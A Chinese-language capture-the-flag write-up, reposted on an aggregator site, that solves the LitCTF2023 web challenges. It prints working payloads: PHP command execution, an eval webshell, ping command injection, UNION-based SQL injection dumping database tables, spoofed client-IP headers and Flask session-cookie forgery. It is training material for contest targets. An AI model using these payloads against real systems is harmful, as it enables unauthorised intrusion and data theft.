[LitCTF2023] web方向全题解wp

这篇具有很好参考价值的文章主要介绍了[LitCTF2023] web方向全题解wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

LitCTF2023

我Flag呢?

[LitCTF2023] web方向全题解wp

签到题,f12获取flag

这里注意看一下源代码,有彩蛋
[LitCTF2023] web方向全题解wp

先留着

LitCTF{First_t0_The_k3y! (1/?) 

导弹迷踪

前端js小游戏

开调试器进行代码审计

可知当游戏进入finished状态的时候会得到flag,可以直接找到

[LitCTF2023] web方向全题解wp

Follow me and hack me

传参题,按照要求传参直接出

[LitCTF2023] web方向全题解wp

CTF=Lit2023
Post:Challenge = i'm_c0m1ng

传入得到flag,然后提示备份文件还有好恰的,备份文件无非几种,直接访问www.zip

[LitCTF2023] web方向全题解wp

下载压缩包,压缩包里有index.php.bak文件,打开

[LitCTF2023] web方向全题解wp

获得第三个彩蛋

[LitCTF2023] web方向全题解wp

_R3ady_Pl4yer_000ne_ (3/?)

PHP是世界上最好的语言!!

看文本框是进行代码执行,直接在右边构造payload:

system("ls /");

[LitCTF2023] web方向全题解wp

然后cat /f*得到flag

[LitCTF2023] web方向全题解wp

Vim yyds

利用dirsearch扫描网站

dirsearch.py -u http://node5.anna.nssctf.cn:28266/

扫描结果如下:

[LitCTF2023] web方向全题解wp

Vim缓存泄露,输入如扫描结果,访问/.index.php.swp会下载该文件

[LitCTF2023] web方向全题解wp

整理后代码如下,仔细看前面的代码php短标签是反着来,所以要整理下:

<?php
error_reporting(0);
$password = "Give_Me_Your_Flag"; 
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)){
	echo "<p>Oh You got my password!</p>"
        eval(system($_POST['cmd'])); 
}
?>

说明我们要传入password变量,使其值base64加密后的Give_Me_Your_Flag

构造payload:

POST
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=

[LitCTF2023] web方向全题解wp

You got password!

接下来post传入cmd变量进行rce就可以得到flag

cmd=ls /
cmd=cat /f*

作业管理系统

[LitCTF2023] web方向全题解wp

f12有hint,默认账户和密码都是admin

这道题一眼就知道有好多种写法,文件上传一种,文件创建一种,这里用的是文件创建
[LitCTF2023] web方向全题解wp

创建文件名为flag.php

[LitCTF2023] web方向全题解wp

然后编辑文件,内容就是基本的文件上传漏洞的内容

<?php
@eval($_POST["Leaf"]);
?>

[LitCTF2023] web方向全题解wp

然后点保存,接下来返回开始的界面去访问该文件

http://node5.anna.nssctf.cn:28807/flag.php

存在说明已经创建成功,接下来可以选择RCE或者蚁剑连接,我选的用蚁剑连接

[LitCTF2023] web方向全题解wp

连接成功,在根目录下得到flag

Ping

ping命令考察,先输入127.0.1试试水,可以有回显

[LitCTF2023] web方向全题解wp

然后构造payload扫描根目录:

127.0.0.1|ls;

[LitCTF2023] web方向全题解wp

这里多试了几次管道符,猜测是前端检测,利用burp抓包然后改包

通过抓包改变ping命令

127.0.0.1;ls

获得到根目录下文件

[LitCTF2023] web方向全题解wp

然后构造payload获得flag

127.0.0.1;cat /*

[LitCTF2023] web方向全题解wp

这是什么?SQL !注一下 !

已经告诉你闭合方式了,直接开注!

先判断显示位,payload:

-1)))))) union select 1,2#

[LitCTF2023] web方向全题解wp

爆库:

1)))))) and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata#

得到库名

information_schema,mysql,ctftraining,performance_schema,test,ctf

爆表:

1)))))) and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema="ctf"

得到表名:

users

爆列:

1)))))) and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name="users"#

得到列名:

id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

获取值:

1)))))) and 1=2 union select 1,group_concat(password) from ctf.users

获得彩蛋(难蚌):

OHHHHHHH,F1rst_to_Th3_eggggggggg!} 

重新爆表:

1)))))) and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema="ctftraining"#

得到表明:

flag,news,users

重新爆列:

1)))))) and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name="flag"#

获得列名:

flag

重新获取值:

1)))))) and 1=2 union select 1,group_concat(flag) from ctftraining.flag#

彩蛋

我们通过前面的题已经得到了4个彩蛋,组合一下

LitCTF{First_t0_The_k3y! (1/?)

_S0_ne3t? (2/?)

_R3ady_Pl4yer_000ne_ (3/?)

F1rst_to_Th3_eggggggggg!}

组合获得flag:

NSSCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}

Http pro max plus

postman杀穿了()

[LitCTF2023] web方向全题解wp

显示只允许本地访问,第一反应就是伪造X-Forwarded-For头,但是被嘲讽了

[LitCTF2023] web方向全题解wp

于是又试了好多东西,我直接一并列出来了

X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded: 127.0.0.1
X-Requested-With: 127.0.0.1
X-Forwarded-Proto: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-remote-IP: 127.0.0.1
X-remote-addr: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
Ali-CDN-Real-IP: 127.0.0.1
Cdn-Src-Ip: 127.0.0.1
Cdn-Real-Ip: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
Fastly-Client-Ip: 127.0.0.1
True-Client-Ip: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

最后发现能用的是Client-IP

[LitCTF2023] web方向全题解wp

?我怕这名字不过审,我直接伪造Referer为这个网站了

[LitCTF2023] web方向全题解wp

然后回显要用Chrome浏览器,伪造User-Agent为Chrome

[LitCTF2023] web方向全题解wp

这个找了好久,最后发现是伪造Via

[LitCTF2023] web方向全题解wp

[LitCTF2023] web方向全题解wp

OK,借一部说话,去访问wtfwtfwtfwtf.php文件

得到源码

<html>
<title>你说得对,but where is flag?</title>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>

<body>
	<a href="https://doc.miyun.app/app/clash-win/">
		The first step-----><button>click me to get Clash!</button>
	</a>
</body>

<body>
		//网站被我删了
		The second step-----><button>open your eyes on pornhub️</button>
	</a>
</body>

<body>
	<a href="./jiege.jpg">
		The 3rd step-----><button>that is what you want: 色图.jpg</button>
	</a>
</body>
<!--你就冲吧,什么都冲只会害了你自己 bdy好康的在 /sejishikong.php-->

</html>

可以看到有hint,再访问 /sejishikong.php得到flag

就当无事发生

给了个GitHub项目的链接

[LitCTF2023] web方向全题解wp

https://ProbiusOfficial.github.io

后来听佬说是社工题,我也没照,直接贴链接

https://github.com/ProbiusOfficial/ProbiusOfficial.github.io/commit/f04fe251bf8811324d4e71cd87b4b15581358490#diff-1474f5fa679c8ac3ff897f022f78e6d753c107596c85a05c06a7466478a3f43

然后在flag是什么呢里面可以找到flag

[LitCTF2023] web方向全题解wp

1zjs

魔方小游戏,一开始不信是代码审计,所以就用dirsearch扫了扫(没啥用)

[LitCTF2023] web方向全题解wp

那就审呗,看源代码得到hint,进入f@k3f1ag.php文件

[LitCTF2023] web方向全题解wp

得到一段jsfuck解密(md,看的我眼花),控制台跑一下,得到flag

[LitCTF2023] web方向全题解wp

Flag点击就送!

一开始没什么思路,就先用dirsearch扫了扫
[LitCTF2023] web方向全题解wp

没有扫出来什么东西,然后就随便看,看到了有session

[LitCTF2023] web方向全题解wp

猜测是session伪造,但是要是想进行session伪造就要先知道secret_key,由于没有明显提示secret_key只能猜,联想比赛题目,是LitCTF,利用flask_session_cookie_manager3进行session伪造,先验证正确性:

[LitCTF2023] web方向全题解wp

decode解密成功,然后接下来就进行session伪造

[LitCTF2023] web方向全题解wp

把伪造好的session利用burp抓包然后修改

eyJuYW1lIjoiYWRtaW4ifQ.ZGCq-A.8H9RmjSBHw5uvGpprkWTXFFcxlE

[LitCTF2023] web方向全题解wp

得到flag
关于session伪造具体可以看[HDCTF2023] NSSweb方向题解的YamiYami文章来源地址https://www.toymoban.com/news/detail-456167.html

到了这里,关于[LitCTF2023] web方向全题解wp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • NewStarCTF 2022 web方向题解 wp

    先看题目,要传参加绕过。 分析一下代码:首先get一个data= data://test/plain, Wel…。然后key1和2用数组可以绕过。num=2077a可以绕过弱类型。eval()中的php语句被 # 注释了,我们需要通过换行 %0a 来忽视这个注释,所以再构造cmd=%0asystem(‘ls /’); 看看题干,伪随机数工具。 分析一下代

    2024年02月11日
    浏览(35)
  • 2023SHCTF web方向wp

    看一眼,你大爷,啥玩意都给我过滤完了。 还好下面有preg_replace()/e,会把replacement当作php语句执行 传参pattern=.*, .*表示任意字符,code={${phpinfo()}} ,为什么这样写,因为 , \\\'print_r(\\\"\\\\1\\\")\\\' ,如果直接传phpinfo(),会被当作字符串对待,而 php中{}里面的变量会被解析,这样就能执行

    2024年02月06日
    浏览(40)
  • [NewStarCTF 2023] web题解

    打开题目,提示有敏感信息泄露 直接扫一下目录,发现有 ./www.zip 访问然后下载下来,解压到桌面 源码和robots.txt分别是两部分flag 右键看下源码,发现对上传文件后缀名有检测 这里的检测是后缀名只需要出现合法的就行 我们上传1.jpg的一句话木马 然后抓包修改文件名为 1.

    2024年02月05日
    浏览(32)
  • [0xGameCTF 2023] web题解

    打开题目,查看下js代码 在main.js里找到flag 简单分析一下,参数a和b值不相等但MD5相等;参数c不为数字,不等于1024,且转换为整数时等于1024;参数name为伪协议 得到flag 就是一些基本的http请求知识 按照要求来,得到flag 打开题目,提示git泄露 使用工具 先运行工具 GitHack ,再

    2024年02月06日
    浏览(31)
  • [LitCTF 2023]作业管理系统

    打开环境后是一个登录框,还以为是sql注入,但是尝试之后没有回显,尝试一下弱密码爆破咯 爆出都是admin 进入后可以看到很多选项,都是可以访问的 ,说明这道题还有很多解决方法 我们可选择上传文件,没有任何过滤,直接连接就好 或者创建文件后选择编辑,往里面写入

    2024年02月15日
    浏览(37)
  • [LitCTF 2023]Http pro max plus

     打开环境后提示说,只允许在本地访问,本地访问,还是想到了XFF字段  好家伙的,直接被嘲讽,还是了解太少了,都不知道还有没有其他方式可以控制ip地址信息  经过查看wp,得知一种新的方式 当客户端发送HTTP请求时,可以使用不同的字段来传递客户端IP地址。 Client-

    2024年02月09日
    浏览(21)
  • [LitCTF 2023]作业管理系统 - 文件上传+弱口令

    1、F12看到页面源代码有注释:默认账户admin admin 使用:admin-admin 可直接登录 2、上传一句话木马 3、蚁剑连接找flag=NSSCTF{d969ad7a-9cb5-4564-a662-191a00e007a5}

    2024年02月07日
    浏览(42)
  • [LitCTF 2023]Follow me and hack me

       

    2024年02月12日
    浏览(46)
  • *CTF 2023 web jwt2struts 题解wp

    根据题目名字猜测,这题考察jwt和Struts2 包里面果然有一个cookie 验证了,是jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyIiwiZXhwIjoyMDA2MjI1MjgxfQ.F7vOtdqg48M1DYK4tVZywTipIYDqKfsBSju7ekLSecU 我们的目标应该是把 user 改成 admin 首先,直接修改试试,结果是不行的。 再尝试一下爆破: 也是不行

    2024年02月14日
    浏览(36)
  • 【2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~

    泄露的秘密 www.zip Begin of Upload 打开源码 找到限制是在前端 我们抓包 上传正常后缀的文件 比如jpg结尾 但是这样传上去服务器是无法解析的 所以我们进行抓包 然后在bp中修改后缀名 将我们上传的后缀jpg在请求包中改为php 服务器就可以解析我们的语句了 一句话木马: ?php eval

    2024年02月06日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包